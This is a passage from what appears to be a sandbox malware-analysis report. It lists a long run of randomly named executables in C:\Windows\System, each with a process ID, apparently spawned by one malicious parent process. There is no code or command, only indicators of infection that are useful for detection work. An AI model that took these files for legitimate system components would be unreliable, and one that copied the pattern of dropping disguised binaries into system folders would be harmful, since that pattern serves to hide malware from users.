  C:\Windows\System\DbnnqLV.exe
  2⤵
  PID:9292
- C:\Windows\System\mehqJma.exe
  C:\Windows\System\mehqJma.exe
  2⤵
  PID:9440
- C:\Windows\System\gFUBdmc.exe
  C:\Windows\System\gFUBdmc.exe
  2⤵
  PID:9444
- C:\Windows\System\goavwPT.exe
  C:\Windows\System\goavwPT.exe
  2⤵
  PID:9540
- C:\Windows\System\bDbiAQw.exe
  C:\Windows\System\bDbiAQw.exe
  2⤵
  PID:9548
- C:\Windows\System\YNiYPhF.exe
  C:\Windows\System\YNiYPhF.exe
  2⤵
  PID:9408
- C:\Windows\System\rqPJqZw.exe
  C:\Windows\System\rqPJqZw.exe
  2⤵
  PID:9484
- C:\Windows\System\jjBMxaY.exe
  C:\Windows\System\jjBMxaY.exe
  2⤵
  PID:10092
- C:\Windows\System\oWQBmUF.exe
  C:\Windows\System\oWQBmUF.exe
  2⤵
  PID:9584
- C:\Windows\System\DexPRdA.exe
  C:\Windows\System\DexPRdA.exe
  2⤵
  PID:9580
- C:\Windows\System\oulHZCO.exe
  C:\Windows\System\oulHZCO.exe
  2⤵
  PID:9628
- C:\Windows\System\EiCROnq.exe
  C:\Windows\System\EiCROnq.exe
  2⤵
  PID:9616
- C:\Windows\System\epQLrij.exe
  C:\Windows\System\epQLrij.exe
  2⤵
  PID:9664
- C:\Windows\System\nudZXlY.exe
  C:\Windows\System\nudZXlY.exe
  2⤵
  PID:1336
- C:\Windows\System\sxtxBdL.exe
  C:\Windows\System\sxtxBdL.exe
  2⤵
  PID:9720
- C:\Windows\System\QKTsbRl.exe
  C:\Windows\System\QKTsbRl.exe
  2⤵
  PID:4396
- C:\Windows\System\MGPemLy.exe
  C:\Windows\System\MGPemLy.exe
  2⤵
  PID:9760
- C:\Windows\System\uAAmZRX.exe
  C:\Windows\System\uAAmZRX.exe
  2⤵
  PID:9780
- C:\Windows\System\Yotukis.exe
  C:\Windows\System\Yotukis.exe
  2⤵
  PID:9804
- C:\Windows\System\UKgkpkF.exe
  C:\Windows\System\UKgkpkF.exe
  2⤵
  PID:7472
- C:\Windows\System\EeHNyAP.exe
  C:\Windows\System\EeHNyAP.exe
  2⤵
  PID:9836
- C:\Windows\System\meERvrt.exe
  C:\Windows\System\meERvrt.exe
  2⤵
  PID:9872
- C:\Windows\System\xBAvOcb.exe
  C:\Windows\System\xBAvOcb.exe
  2⤵
  PID:9900
- C:\Windows\System\zgqgsgs.exe
  C:\Windows\System\zgqgsgs.exe
  2⤵
  PID:9920
- C:\Windows\System\TSLICcN.exe
  C:\Windows\System\TSLICcN.exe
  2⤵
  PID:9140
- C:\Windows\System\FgAidpB.exe
  C:\Windows\System\FgAidpB.exe
  2⤵
  PID:9280
- C:\Windows\System\hUsUuUW.exe
  C:\Windows\System\hUsUuUW.exe
  2⤵
  PID:9948
- C:\Windows\System\pKmjEMc.exe
  C:\Windows\System\pKmjEMc.exe
  2⤵
  PID:9960
- C:\Windows\System\tUDAQhY.exe
  C:\Windows\System\tUDAQhY.exe
  2⤵
  PID:9968
- C:\Windows\System\CNgpPua.exe
  C:\Windows\System\CNgpPua.exe
  2⤵
  PID:3720
- C:\Windows\System\kydimmE.exe
  C:\Windows\System\kydimmE.exe
  2⤵
  PID:4252
- C:\Windows\System\hzgWfsa.exe
  C:\Windows\System\hzgWfsa.exe
  2⤵
  PID:10004
- C:\Windows\System\ojgDkCp.exe
  C:\Windows\System\ojgDkCp.exe
  2⤵
  PID:10024
- C:\Windows\System\wDvJrAb.exe
  C:\Windows\System\wDvJrAb.exe
  2⤵
  PID:10048
- C:\Windows\System\NJpcVAV.exe
  C:\Windows\System\NJpcVAV.exe
  2⤵
  PID:10060
- C:\Windows\System\lGwFdFg.exe
  C:\Windows\System\lGwFdFg.exe
  2⤵
  PID:10052
- C:\Windows\System\WwcgNQq.exe
  C:\Windows\System\WwcgNQq.exe
  2⤵
  PID:3220
- C:\Windows\System\MOBFrKA.exe
  C:\Windows\System\MOBFrKA.exe
  2⤵
  PID:10132
- C:\Windows\System\ZyUMjuX.exe
  C:\Windows\System\ZyUMjuX.exe
  2⤵
  PID:10156
- C:\Windows\System\ZPsRKfd.exe
  C:\Windows\System\ZPsRKfd.exe
  2⤵
  PID:10172
- C:\Windows\System\CyYobUf.exe
  C:\Windows\System\CyYobUf.exe
  2⤵
  PID:10196
- C:\Windows\System\ykItbNv.exe
  C:\Windows\System\ykItbNv.exe
  2⤵
  PID:9676
- C:\Windows\System\LBEKgnA.exe
  C:\Windows\System\LBEKgnA.exe
  2⤵
  PID:9692
- C:\Windows\System\PHKkAiS.exe
  C:\Windows\System\PHKkAiS.exe
  2⤵
  PID:9724
- C:\Windows\System\XRxNigE.exe
  C:\Windows\System\XRxNigE.exe
  2⤵
  PID:3596
- C:\Windows\System\QqPSbZT.exe
  C:\Windows\System\QqPSbZT.exe
  2⤵
  PID:9776
- C:\Windows\System\IryrIyg.exe
  C:\Windows\System\IryrIyg.exe
  2⤵
  PID:9788
- C:\Windows\System\ELiCXRL.exe
  C:\Windows\System\ELiCXRL.exe
  2⤵
  PID:4284
- C:\Windows\System\zxaKLzE.exe
  C:\Windows\System\zxaKLzE.exe
  2⤵
  PID:4924
- C:\Windows\System\QPurCgJ.exe
  C:\Windows\System\QPurCgJ.exe
  2⤵
  PID:2384
- C:\Windows\System\xOFJLwI.exe
  C:\Windows\System\xOFJLwI.exe
  2⤵
  PID:9884
- C:\Windows\System\FSOLiax.exe
  C:\Windows\System\FSOLiax.exe
  2⤵
  PID:4916
- C:\Windows\System\biveZLZ.exe
  C:\Windows\System\biveZLZ.exe
  2⤵
  PID:4280
- C:\Windows\System\nRPDNAq.exe
  C:\Windows\System\nRPDNAq.exe
  2⤵
  PID:9912
- C:\Windows\System\gzGdwUv.exe
  C:\Windows\System\gzGdwUv.exe
  2⤵
  PID:9944
- C:\Windows\System\dRpnBuw.exe
  C:\Windows\System\dRpnBuw.exe
  2⤵
  PID:844
- C:\Windows\System\oURmyQT.exe
  C:\Windows\System\oURmyQT.exe
  2⤵
  PID:8748
- C:\Windows\System\CcieGiZ.exe
  C:\Windows\System\CcieGiZ.exe
  2⤵
  PID:4248
- C:\Windows\System\fORLVVm.exe
  C:\Windows\System\fORLVVm.exe
  2⤵
  PID:9936
- C:\Windows\System\XoOCEot.exe
  C:\Windows\System\XoOCEot.exe
  2⤵
  PID:8944
- C:\Windows\System\WnhOKpS.exe
  C:\Windows\System\WnhOKpS.exe
  2⤵
  PID:9992
- C:\Windows\System\PblWlKy.exe
  C:\Windows\System\PblWlKy.exe
  2⤵
  PID:2624
- C:\Windows\System\iLJPUMB.exe
  C:\Windows\System\iLJPUMB.exe
  2⤵
  PID:10020
- C:\Windows\System\hLkqNYZ.exe
  C:\Windows\System\hLkqNYZ.exe
  2⤵
  PID:2468
- C:\Windows\System\RLrfIDy.exe
  C:\Windows\System\RLrfIDy.exe
  2⤵
  PID:10084
- C:\Windows\System\ksLweSp.exe
  C:\Windows\System\ksLweSp.exe
  2⤵
  PID:3260
- C:\Windows\System\CVTeCJX.exe
  C:\Windows\System\CVTeCJX.exe
  2⤵
  PID:3584
- C:\Windows\System\XLDBpzg.exe
  C:\Windows\System\XLDBpzg.exe
  2⤵
  PID:1464
- C:\Windows\System\EMIKXjn.exe
  C:\Windows\System\EMIKXjn.exe
  2⤵
  PID:2436
- C:\Windows\System\saDYFCl.exe
  C:\Windows\System\saDYFCl.exe
  2⤵
  PID:10168
- C:\Windows\System\kQtEACz.exe
  C:\Windows\System\kQtEACz.exe
  2⤵
  PID:4228
- C:\Windows\System\RtlSwxw.exe
  C:\Windows\System\RtlSwxw.exe
  2⤵
  PID:10204
- C:\Windows\System\HlnJCIA.exe
  C:\Windows\System\HlnJCIA.exe
  2⤵
  PID:2300
- C:\Windows\System\nsyEAwG.exe
  C:\Windows\System\nsyEAwG.exe
  2⤵
  PID:2636
- C:\Windows\System\wEVCwLw.exe
  C:\Windows\System\wEVCwLw.exe
  2⤵
  PID:10236
- C:\Windows\System\OENufBI.exe
  C:\Windows\System\OENufBI.exe
  2⤵
  PID:5060
- C:\Windows\System\MLSisgc.exe
  C:\Windows\System\MLSisgc.exe
  2⤵
  PID:9296
- C:\Windows\System\nvIEqvc.exe
  C:\Windows\System\nvIEqvc.exe
  2⤵
  PID:8272
- C:\Windows\System\aQQDSLJ.exe
  C:\Windows\System\aQQDSLJ.exe
  2⤵
  PID:9428
- C:\Windows\System\pNehlsy.exe
  C:\Windows\System\pNehlsy.exe
  2⤵
  PID:9472
- C:\Windows\System\BYWUkld.exe
  C:\Windows\System\BYWUkld.exe
  2⤵
  PID:9404
- C:\Windows\System\ytsjdjG.exe
  C:\Windows\System\ytsjdjG.exe
  2⤵
  PID:9464
- C:\Windows\System\Lhqzzth.exe
  C:\Windows\System\Lhqzzth.exe
  2⤵
  PID:3520
- C:\Windows\System\LsPAuuN.exe
  C:\Windows\System\LsPAuuN.exe
  2⤵
  PID:9528
- C:\Windows\System\XoNtzJU.exe
  C:\Windows\System\XoNtzJU.exe
  2⤵
  PID:2472
- C:\Windows\System\thBZlgT.exe
  C:\Windows\System\thBZlgT.exe
  2⤵
  PID:3668
- C:\Windows\System\AnkuCJS.exe
  C:\Windows\System\AnkuCJS.exe
  2⤵
  PID:3020
- C:\Windows\System\YzoXmDX.exe
  C:\Windows\System\YzoXmDX.exe
  2⤵
  PID:4324
- C:\Windows\System\KTwvROQ.exe
  C:\Windows\System\KTwvROQ.exe
  2⤵
  PID:9608
- C:\Windows\System\EdwcRbz.exe
  C:\Windows\System\EdwcRbz.exe
  2⤵
  PID:9712
- C:\Windows\System\AdCibaa.exe
  C:\Windows\System\AdCibaa.exe
  2⤵
  PID:10040
- C:\Windows\System\slwniiU.exe
  C:\Windows\System\slwniiU.exe
  2⤵
  PID:9800
- C:\Windows\System\aPCmQni.exe
  C:\Windows\System\aPCmQni.exe
  2⤵
  PID:9812
- C:\Windows\System\uLbHmOe.exe
  C:\Windows\System\uLbHmOe.exe
  2⤵
  PID:9864
- C:\Windows\System\mDvnKYZ.exe
  C:\Windows\System\mDvnKYZ.exe
  2⤵
  PID:3728
- C:\Windows\System\ERtrvek.exe
  C:\Windows\System\ERtrvek.exe
  2⤵
  PID:9808
- C:\Windows\System\xFMkjFp.exe
  C:\Windows\System\xFMkjFp.exe
  2⤵
  PID:9956
- C:\Windows\System\wuNxgCt.exe
  C:\Windows\System\wuNxgCt.exe
  2⤵
  PID:5032
- C:\Windows\System\MedaIwU.exe
  C:\Windows\System\MedaIwU.exe
  2⤵
  PID:4888
- C:\Windows\System\OGJnHIM.exe
  C:\Windows\System\OGJnHIM.exe
  2⤵
  PID:3148
- C:\Windows\System\GtuRQoV.exe
  C:\Windows\System\GtuRQoV.exe
  2⤵
  PID:10028
- C:\Windows\System\BsIZOxs.exe
  C:\Windows\System\BsIZOxs.exe
  2⤵
  PID:4140
- C:\Windows\System\poeSuyH.exe
  C:\Windows\System\poeSuyH.exe
  2⤵
  PID:2100
- C:\Windows\System\cCGnqGF.exe
  C:\Windows\System\cCGnqGF.exe
  2⤵
  PID:10000
- C:\Windows\System\FDZRtFf.exe
  C:\Windows\System\FDZRtFf.exe
  2⤵
  PID:1040
- C:\Windows\System\qXwraQn.exe
  C:\Windows\System\qXwraQn.exe
  2⤵
  PID:1652
- C:\Windows\System\pgrWsJo.exe
  C:\Windows\System\pgrWsJo.exe
  2⤵
  PID:5080
- C:\Windows\System\cCIlqiv.exe
  C:\Windows\System\cCIlqiv.exe
  2⤵
  PID:4176
- C:\Windows\System\hCPogCn.exe
  C:\Windows\System\hCPogCn.exe
  2⤵
  PID:1580
- C:\Windows\System\chwQlCJ.exe
  C:\Windows\System\chwQlCJ.exe
  2⤵
  PID:10216
- C:\Windows\System\hITxcSJ.exe
  C:\Windows\System\hITxcSJ.exe
  2⤵
  PID:4704
- C:\Windows\System\CpTCNpF.exe
  C:\Windows\System\CpTCNpF.exe
  2⤵
  PID:5048
- C:\Windows\System\WMsDpdA.exe
  C:\Windows\System\WMsDpdA.exe
  2⤵
  PID:1892
- C:\Windows\System\YATjXdh.exe
  C:\Windows\System\YATjXdh.exe
  2⤵
  PID:10012
- C:\Windows\System\DVSXcwS.exe
  C:\Windows\System\DVSXcwS.exe
  2⤵
  PID:9996
- C:\Windows\System\lOCadDE.exe
  C:\Windows\System\lOCadDE.exe
  2⤵
  PID:10076
- C:\Windows\System\qCOnNDc.exe
  C:\Windows\System\qCOnNDc.exe
  2⤵
  PID:4572
- C:\Windows\System\GDKtzTF.exe
  C:\Windows\System\GDKtzTF.exe
  2⤵
  PID:5056
- C:\Windows\System\qKQdDao.exe
  C:\Windows\System\qKQdDao.exe
  2⤵
  PID:820
- C:\Windows\System\jPnUpep.exe
  C:\Windows\System\jPnUpep.exe
  2⤵
  PID:10200
- C:\Windows\System\GnTYTmk.exe
  C:\Windows\System\GnTYTmk.exe
  2⤵
  PID:9400
- C:\Windows\System\CIGJbbc.exe
  C:\Windows\System\CIGJbbc.exe
  2⤵
  PID:5428
- C:\Windows\System\fHPMaeX.exe
  C:\Windows\System\fHPMaeX.exe
  2⤵
  PID:1584
- C:\Windows\System\thavqdu.exe
  C:\Windows\System\thavqdu.exe
  2⤵
  PID:9512
- C:\Windows\System\TRWIqsa.exe
  C:\Windows\System\TRWIqsa.exe
  2⤵
  PID:9640
- C:\Windows\System\pOpKNmG.exe
  C:\Windows\System\pOpKNmG.exe
  2⤵
  PID:9744
- C:\Windows\System\xbggxoW.exe
  C:\Windows\System\xbggxoW.exe
  2⤵
  PID:2628
- C:\Windows\System\uDxkpxt.exe
  C:\Windows\System\uDxkpxt.exe
  2⤵
  PID:9632
- C:\Windows\System\RTlscTH.exe
  C:\Windows\System\RTlscTH.exe
  2⤵
  PID:9136
- C:\Windows\System\dPtitel.exe
  C:\Windows\System\dPtitel.exe
  2⤵
  PID:5552
- C:\Windows\System\vLneMoj.exe
  C:\Windows\System\vLneMoj.exe
  2⤵
  PID:4372
- C:\Windows\System\rIbACVd.exe
  C:\Windows\System\rIbACVd.exe
  2⤵
  PID:3608
- C:\Windows\System\ocxSMne.exe
  C:\Windows\System\ocxSMne.exe
  2⤵
  PID:1976
- C:\Windows\System\zomNiFH.exe
  C:\Windows\System\zomNiFH.exe
  2⤵
  PID:5780
- C:\Windows\System\ZEiMTtZ.exe
  C:\Windows\System\ZEiMTtZ.exe
  2⤵
  PID:5492
- C:\Windows\System\ZDiCBKn.exe
  C:\Windows\System\ZDiCBKn.exe
  2⤵
  PID:5684
- C:\Windows\System\FAWWVSb.exe
  C:\Windows\System\FAWWVSb.exe
  2⤵
  PID:4860
- C:\Windows\System\ATACJQh.exe
  C:\Windows\System\ATACJQh.exe
  2⤵
  PID:5804
- C:\Windows\System\oVfqDIo.exe
  C:\Windows\System\oVfqDIo.exe
  2⤵
  PID:2552
- C:\Windows\System\HHclOaT.exe
  C:\Windows\System\HHclOaT.exe
  2⤵
  PID:2144
- C:\Windows\System\KTISjFk.exe
  C:\Windows\System\KTISjFk.exe
  2⤵
  PID:10224
- C:\Windows\System\HCeJpEk.exe
  C:\Windows\System\HCeJpEk.exe
  2⤵
  PID:5908
- C:\Windows\System\dGHtxwR.exe
  C:\Windows\System\dGHtxwR.exe
  2⤵
  PID:3816
- C:\Windows\System\DoydxNn.exe
  C:\Windows\System\DoydxNn.exe
  2⤵
  PID:6056
- C:\Windows\System\JLIbKww.exe
  C:\Windows\System\JLIbKww.exe
  2⤵
  PID:6076
- C:\Windows\System\athsCFj.exe
  C:\Windows\System\athsCFj.exe
  2⤵
  PID:4048
- C:\Windows\System\BEgoplc.exe
  C:\Windows\System\BEgoplc.exe
  2⤵
  PID:4556
- C:\Windows\System\hyNAURn.exe
  C:\Windows\System\hyNAURn.exe
  2⤵
  PID:2496
- C:\Windows\System\XJpBdLt.exe
  C:\Windows\System\XJpBdLt.exe
  2⤵
  PID:5340
- C:\Windows\System\qgiULGh.exe
  C:\Windows\System\qgiULGh.exe
  2⤵
  PID:4620
- C:\Windows\System\VNVUwLP.exe
  C:\Windows\System\VNVUwLP.exe
  2⤵
  PID:9588
- C:\Windows\System\RQyBGHp.exe
  C:\Windows\System\RQyBGHp.exe
  2⤵
  PID:2832
- C:\Windows\System\PgBJZvs.exe
  C:\Windows\System\PgBJZvs.exe
  2⤵
  PID:4552
- C:\Windows\System\wOhyrJQ.exe
  C:\Windows\System\wOhyrJQ.exe
  2⤵
  PID:5196
- C:\Windows\System\OXWTaBL.exe
  C:\Windows\System\OXWTaBL.exe
  2⤵
  PID:1404
- C:\Windows\System\HtkaBMD.exe
  C:\Windows\System\HtkaBMD.exe
  2⤵
  PID:2664
- C:\Windows\System\WEDqkxW.exe
  C:\Windows\System\WEDqkxW.exe
  2⤵
  PID:5672
- C:\Windows\System\xdQdyvY.exe
  C:\Windows\System\xdQdyvY.exe
  2⤵
  PID:532
- C:\Windows\System\mIEgdpB.exe
  C:\Windows\System\mIEgdpB.exe
  2⤵
  PID:5600
- C:\Windows\System\qtoERBX.exe
  C:\Windows\System\qtoERBX.exe
  2⤵
  PID:9520
- C:\Windows\System\FFTLktj.exe
  C:\Windows\System\FFTLktj.exe
  2⤵
  PID:9568
- C:\Windows\System\YkmwLmd.exe
  C:\Windows\System\YkmwLmd.exe
  2⤵
  PID:5584
- C:\Windows\System\JcKxPkl.exe
  C:\Windows\System\JcKxPkl.exe
  2⤵
  PID:5624
- C:\Windows\System\sEsuogR.exe
  C:\Windows\System\sEsuogR.exe
  2⤵
  PID:3964
- C:\Windows\System\TpYQPCG.exe
  C:\Windows\System\TpYQPCG.exe
  2⤵
  PID:1184
- C:\Windows\System\OwGiGHZ.exe
  C:\Windows\System\OwGiGHZ.exe
  2⤵
  PID:5808
- C:\Windows\System\cOmLaxe.exe
  C:\Windows\System\cOmLaxe.exe
  2⤵
  PID:5784
- C:\Windows\System\DQvgzmk.exe
  C:\Windows\System\DQvgzmk.exe
  2⤵
  PID:5916
- C:\Windows\System\poSKDrm.exe
  C:\Windows\System\poSKDrm.exe
  2⤵
  PID:5924
- C:\Windows\System\IwPoFid.exe
  C:\Windows\System\IwPoFid.exe
  2⤵
  PID:9792
- C:\Windows\System\IrcTlhw.exe
  C:\Windows\System\IrcTlhw.exe
  2⤵
  PID:5484
- C:\Windows\System\VGPynfg.exe
  C:\Windows\System\VGPynfg.exe
  2⤵
  PID:6316
- C:\Windows\System\eOAuvXz.exe
  C:\Windows\System\eOAuvXz.exe
  2⤵
  PID:5168
- C:\Windows\System\YZjrphb.exe
  C:\Windows\System\YZjrphb.exe
  2⤵
  PID:4616
- C:\Windows\System\dufGZdT.exe
  C:\Windows\System\dufGZdT.exe
  2⤵
  PID:3144
- C:\Windows\System\ZdZaIYE.exe
  C:\Windows\System\ZdZaIYE.exe
  2⤵
  PID:10160
- C:\Windows\System\GfbQIBU.exe
  C:\Windows\System\GfbQIBU.exe
  2⤵
  PID:9988
- C:\Windows\System\HLzynaC.exe
  C:\Windows\System\HLzynaC.exe
  2⤵
  PID:5900
- C:\Windows\System\VcgaiUb.exe
  C:\Windows\System\VcgaiUb.exe
  2⤵
  PID:5656
- C:\Windows\System\qSPKXVx.exe
  C:\Windows\System\qSPKXVx.exe
  2⤵
  PID:5576
- C:\Windows\System\XIMTefr.exe
  C:\Windows\System\XIMTefr.exe
  2⤵
  PID:2876
- C:\Windows\System\FtSwQcr.exe
  C:\Windows\System\FtSwQcr.exe
  2⤵
  PID:5440
- C:\Windows\System\uPcIdXa.exe
  C:\Windows\System\uPcIdXa.exe
  2⤵
  PID:1436
- C:\Windows\System\GDwDQdI.exe
  C:\Windows\System\GDwDQdI.exe
  2⤵
  PID:4384
- C:\Windows\System\ESbfrCA.exe
  C:\Windows\System\ESbfrCA.exe
  2⤵
  PID:5328
- C:\Windows\System\TuNiHzI.exe
  C:\Windows\System\TuNiHzI.exe
  2⤵
  PID:3992
- C:\Windows\System\kTNdoIo.exe
  C:\Windows\System\kTNdoIo.exe
  2⤵
  PID:5352
- C:\Windows\System\cpepyon.exe
  C:\Windows\System\cpepyon.exe
  2⤵
  PID:5256
- C:\Windows\System\yNiCuur.exe
  C:\Windows\System\yNiCuur.exe
  2⤵
  PID:1972
- C:\Windows\System\EAbryEp.exe
  C:\Windows\System\EAbryEp.exe
  2⤵
  PID:4728
- C:\Windows\System\qRePGPd.exe
  C:\Windows\System\qRePGPd.exe
  2⤵
  PID:5888
- C:\Windows\System\hcioumy.exe
  C:\Windows\System\hcioumy.exe
  2⤵
  PID:660
- C:\Windows\System\FPZGvoe.exe
  C:\Windows\System\FPZGvoe.exe
  2⤵
  PID:6064
- C:\Windows\System\AJFydWR.exe
  C:\Windows\System\AJFydWR.exe
  2⤵
  PID:5964
- C:\Windows\System\ExdLFEh.exe
  C:\Windows\System\ExdLFEh.exe
  2⤵
  PID:4760
- C:\Windows\System\wjUuuTm.exe
  C:\Windows\System\wjUuuTm.exe
  2⤵
  PID:6068
- C:\Windows\System\nNxMwrW.exe
  C:\Windows\System\nNxMwrW.exe
  2⤵
  PID:4356
- C:\Windows\System\iNfftXc.exe
  C:\Windows\System\iNfftXc.exe
  2⤵
  PID:9748
- C:\Windows\System\DRBLfsJ.exe
  C:\Windows\System\DRBLfsJ.exe
  2⤵
  PID:5244
- C:\Windows\System\DgKxpCm.exe
  C:\Windows\System\DgKxpCm.exe
  2⤵
  PID:9508
- C:\Windows\System\gLuoLfW.exe
  C:\Windows\System\gLuoLfW.exe
  2⤵
  PID:3628
- C:\Windows\System\DYlFONl.exe
  C:\Windows\System\DYlFONl.exe
  2⤵
  PID:8204
- C:\Windows\System\INeHkjQ.exe
  C:\Windows\System\INeHkjQ.exe
  2⤵
  PID:1840
- C:\Windows\System\QuolYsd.exe
  C:\Windows\System\QuolYsd.exe
  2⤵
  PID:5616
- C:\Windows\System\xCVBdeI.exe
  C:\Windows\System\xCVBdeI.exe
  2⤵
  PID:10192
- C:\Windows\System\udSeGzP.exe
  C:\Windows\System\udSeGzP.exe
  2⤵
  PID:10100
- C:\Windows\System\mBAxYhN.exe
  C:\Windows\System\mBAxYhN.exe
  2⤵
  PID:3736
- C:\Windows\System\sMQcuiM.exe
  C:\Windows\System\sMQcuiM.exe
  2⤵
  PID:2572
- C:\Windows\System\kJTqahh.exe
  C:\Windows\System\kJTqahh.exe
  2⤵
  PID:3392
- C:\Windows\System\vGsAGBd.exe
  C:\Windows\System\vGsAGBd.exe
  2⤵
  PID:5448
- C:\Windows\System\nbbhRrf.exe
  C:\Windows\System\nbbhRrf.exe
  2⤵
  PID:4120
- C:\Windows\System\oHJEpKg.exe
  C:\Windows\System\oHJEpKg.exe
  2⤵
  PID:3324
- C:\Windows\System\hYFokBb.exe
  C:\Windows\System\hYFokBb.exe
  2⤵
  PID:5736
- C:\Windows\System\PMluTir.exe
  C:\Windows\System\PMluTir.exe
  2⤵
  PID:1472
- C:\Windows\System\oYVkLoy.exe
  C:\Windows\System\oYVkLoy.exe
  2⤵
  PID:5636
- C:\Windows\System\zXzdFKo.exe
  C:\Windows\System\zXzdFKo.exe
  2⤵
  PID:5868
- C:\Windows\System\jcbkouE.exe
  C:\Windows\System\jcbkouE.exe
  2⤵
  PID:4568
- C:\Windows\System\zYKXKTr.exe
  C:\Windows\System\zYKXKTr.exe
  2⤵
  PID:5436
- C:\Windows\System\wlgJvKf.exe
  C:\Windows\System\wlgJvKf.exe
  2⤵
  PID:1088
- C:\Windows\System\BVteFgt.exe
  C:\Windows\System\BVteFgt.exe
  2⤵
  PID:4336
- C:\Windows\System\gGOYEXo.exe
  C:\Windows\System\gGOYEXo.exe
  2⤵
  PID:5016
- C:\Windows\System\ffvZZlJ.exe
  C:\Windows\System\ffvZZlJ.exe
  2⤵
  PID:1460
- C:\Windows\System\IznmEee.exe
  C:\Windows\System\IznmEee.exe
  2⤵
  PID:4348
- C:\Windows\System\qLPnTsf.exe
  C:\Windows\System\qLPnTsf.exe
  2⤵
  PID:5580
- C:\Windows\System\mJUDITs.exe
  C:\Windows\System\mJUDITs.exe
  2⤵
  PID:5700
- C:\Windows\System\yMWCHCy.exe
  C:\Windows\System\yMWCHCy.exe
  2⤵
  PID:5356
- C:\Windows\System\vaYMhFV.exe
  C:\Windows\System\vaYMhFV.exe
  2⤵
  PID:5740
- C:\Windows\System\jyDVfeI.exe
  C:\Windows\System\jyDVfeI.exe
  2⤵
  PID:1468
- C:\Windows\System\bkamtXp.exe
  C:\Windows\System\bkamtXp.exe
  2⤵
  PID:5364
- C:\Windows\System\DnFIwPe.exe
  C:\Windows\System\DnFIwPe.exe
  2⤵
  PID:2852
- C:\Windows\System\eidzKwu.exe
  C:\Windows\System\eidzKwu.exe
  2⤵
  PID:4712
- C:\Windows\System\sXCwwiZ.exe
  C:\Windows\System\sXCwwiZ.exe
  2⤵
  PID:5000
- C:\Windows\System\JkldsuM.exe
  C:\Windows\System\JkldsuM.exe
  2⤵
  PID:4432
- C:\Windows\System\MeeLUUL.exe
  C:\Windows\System\MeeLUUL.exe
  2⤵
  PID:9592
- C:\Windows\System\aNZkJCL.exe
  C:\Windows\System\aNZkJCL.exe
  2⤵
  PID:10276
- C:\Windows\System\uADYdyv.exe
  C:\Windows\System\uADYdyv.exe
  2⤵
  PID:10296
- C:\Windows\System\NHFGuck.exe
  C:\Windows\System\NHFGuck.exe
  2⤵
  PID:10316
- C:\Windows\System\rUDiXsr.exe
  C:\Windows\System\rUDiXsr.exe
  2⤵
  PID:10336
- C:\Windows\System\TSzGqcv.exe
  C:\Windows\System\TSzGqcv.exe
  2⤵
  PID:10356
- C:\Windows\System\rqJkPvg.exe
  C:\Windows\System\rqJkPvg.exe
  2⤵
  PID:10376
- C:\Windows\System\tyempWj.exe
  C:\Windows\System\tyempWj.exe
  2⤵
  PID:10396
- C:\Windows\System\DXKrMnV.exe
  C:\Windows\System\DXKrMnV.exe
  2⤵
  PID:10420
- C:\Windows\System\snQVrLD.exe
  C:\Windows\System\snQVrLD.exe
  2⤵
  PID:10440
- C:\Windows\System\reViSFy.exe
  C:\Windows\System\reViSFy.exe
  2⤵
  PID:10460
- C:\Windows\System\WwVNGHE.exe
  C:\Windows\System\WwVNGHE.exe
  2⤵
  PID:10496
- C:\Windows\System\gizHrix.exe
  C:\Windows\System\gizHrix.exe
  2⤵
  PID:10516
- C:\Windows\System\cJEeUNq.exe
  C:\Windows\System\cJEeUNq.exe
  2⤵
  PID:10532
- C:\Windows\System\QwxoYwL.exe
  C:\Windows\System\QwxoYwL.exe
  2⤵
  PID:10572
- C:\Windows\System\fUEaMHf.exe
  C:\Windows\System\fUEaMHf.exe
  2⤵
  PID:10604
- C:\Windows\System\XZfiAjB.exe
  C:\Windows\System\XZfiAjB.exe
  2⤵
  PID:10624
- C:\Windows\System\UjZkscD.exe
  C:\Windows\System\UjZkscD.exe
  2⤵
  PID:10644
- C:\Windows\System\WcDHMcm.exe
  C:\Windows\System\WcDHMcm.exe
  2⤵
  PID:10672
- C:\Windows\System\sPZxqgF.exe
  C:\Windows\System\sPZxqgF.exe
  2⤵
  PID:10688
- C:\Windows\System\zSKlCDz.exe
  C:\Windows\System\zSKlCDz.exe
  2⤵
  PID:10708
- C:\Windows\System\NhrtrZQ.exe
  C:\Windows\System\NhrtrZQ.exe
  2⤵
  PID:10728
- C:\Windows\System\uzeDibI.exe
  C:\Windows\System\uzeDibI.exe
  2⤵
  PID:10748
- C:\Windows\System\KqPsUHJ.exe
  C:\Windows\System\KqPsUHJ.exe
  2⤵
  PID:10768
- C:\Windows\System\tshhohP.exe
  C:\Windows\System\tshhohP.exe
  2⤵
  PID:10788
- C:\Windows\System\tDUpXaP.exe
  C:\Windows\System\tDUpXaP.exe
  2⤵
  PID:10820
- C:\Windows\System\lzSSAAV.exe
  C:\Windows\System\lzSSAAV.exe
  2⤵
  PID:10840
- C:\Windows\System\okjldPf.exe
  C:\Windows\System\okjldPf.exe
  2⤵
  PID:10860
- C:\Windows\System\VGQWnVM.exe
  C:\Windows\System\VGQWnVM.exe
  2⤵
  PID:10880
- C:\Windows\System\QssQGKJ.exe
  C:\Windows\System\QssQGKJ.exe
  2⤵
  PID:10900
- C:\Windows\System\XhBOSiv.exe
  C:\Windows\System\XhBOSiv.exe
  2⤵
  PID:10916
- C:\Windows\System\upHnDAs.exe
  C:\Windows\System\upHnDAs.exe
  2⤵
  PID:10936
- C:\Windows\System\EHdYbMb.exe
  C:\Windows\System\EHdYbMb.exe
  2⤵
  PID:10956
- C:\Windows\System\tZmtbbO.exe
  C:\Windows\System\tZmtbbO.exe
  2⤵
  PID:10976
- C:\Windows\System\mlspXYW.exe
  C:\Windows\System\mlspXYW.exe
  2⤵
  PID:11020
- C:\Windows\System\TRxnIHR.exe
  C:\Windows\System\TRxnIHR.exe
  2⤵
  PID:11048
- C:\Windows\System\uAGMBQd.exe
  C:\Windows\System\uAGMBQd.exe
  2⤵
  PID:11064
- C:\Windows\System\oSxsHlH.exe
  C:\Windows\System\oSxsHlH.exe
  2⤵
  PID:11104
- C:\Windows\System\qSuxCLb.exe
  C:\Windows\System\qSuxCLb.exe
  2⤵
  PID:11124
- C:\Windows\System\oMsbxfW.exe
  C:\Windows\System\oMsbxfW.exe
  2⤵
  PID:11148
- C:\Windows\System\rijPXWM.exe
  C:\Windows\System\rijPXWM.exe
  2⤵
  PID:11196
- C:\Windows\System\mBvnLOk.exe
  C:\Windows\System\mBvnLOk.exe
  2⤵
  PID:11220
- C:\Windows\System\vRyYXRE.exe
  C:\Windows\System\vRyYXRE.exe
  2⤵
  PID:11244
- C:\Windows\System\SwLuuaC.exe
  C:\Windows\System\SwLuuaC.exe
  2⤵
  PID:10248
